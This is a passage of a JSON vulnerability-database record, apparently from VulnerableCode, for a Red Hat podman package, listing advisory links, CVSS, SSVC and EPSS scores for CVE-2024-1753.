"https://access.redhat.com/errata/RHSA-2024:2064", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2064" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2066", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2066" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2077", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2077" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2084", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2084" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2089", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2089" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2090", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2090" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2097", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2097" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2098", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2098" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2548", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2548" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2645", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2645" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2669", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2669" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2672", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2672" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2784", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2784" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2877", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2877" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3254", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:3254" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json" }, { "reference_url": "https://access.redhat.com/security/cve/CVE-2024-1753", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/security/cve/CVE-2024-1753" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-1753", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19976", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20034", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22702", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22677", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22752", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22804", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22826", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22788", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22731", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22747", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22742", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-1753" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265513", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265513" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf" }, { "reference_url": "https://github.com/containers/podman", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/containers/podman" }, { "reference_url": "https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1753", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1753" }, { "reference_url": "https://pkg.go.dev/vuln/GO-2024-2658", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://pkg.go.dev/vuln/GO-2024-2658" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800", "reference_id": "1067800", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream", "reference_id": "cpe:/a:redhat:enterprise_linux:8::appstream", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream", "reference_id": "cpe:/a:redhat:enterprise_linux:9::appstream", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11", "reference_id": "cpe:/a:redhat:openshift:3.11", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8", "reference_id": "cpe:/a:redhat:openshift:4.12::el8", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9", "reference_id": "cpe:/a:redhat:openshift:4.12::el9", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8", "reference_id": "cpe:/a:redhat:openshift:4.13::el8", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9", "reference_id": "cpe:/a:redhat:openshift:4.13::el9", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8", "reference_id": "cpe:/a:redhat:openshift:4.14::el8", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9", "reference_id": "cpe:/a:redhat:openshift:4.14::el9", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8", "reference_id": "cpe:/a:redhat:openshift:4.15::el8", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9", "reference_id": "cpe:/a:redhat:openshift:4.15::el9", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream", "reference_id": "cpe:/a:redhat:rhel_eus:8.6::appstream", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream", "reference_id": "cpe:/a:redhat:rhel_eus:8.8::appstream", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream", "reference_id": "cpe:/a:redhat:rhel_eus:9.0::appstream", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream", "reference_id": "cpe:/a:redhat:rhel_eus:9.2::appstream", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7", "reference_id": "cpe:/o:redhat:enterprise_linux:7", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7" }, { "reference_url": "https://security.gentoo.org/glsa/202407-12", "reference_id": "GLSA-202407-12", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202407-12" }, { "reference_url": "https://security.gentoo.org/glsa/202407-25", "reference_id": "GLSA-202407-25", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202407-25" } ], "fixed_packages": [], "aliases": [ "CVE-2024-1753", "GHSA-874v-pj72-92f3" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gyyv-8fkv-syh5" } ], "fixing_vulnerabilities": [], "risk_score": "3.9", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@4:4.9.4-3%3Farch=el9_4" }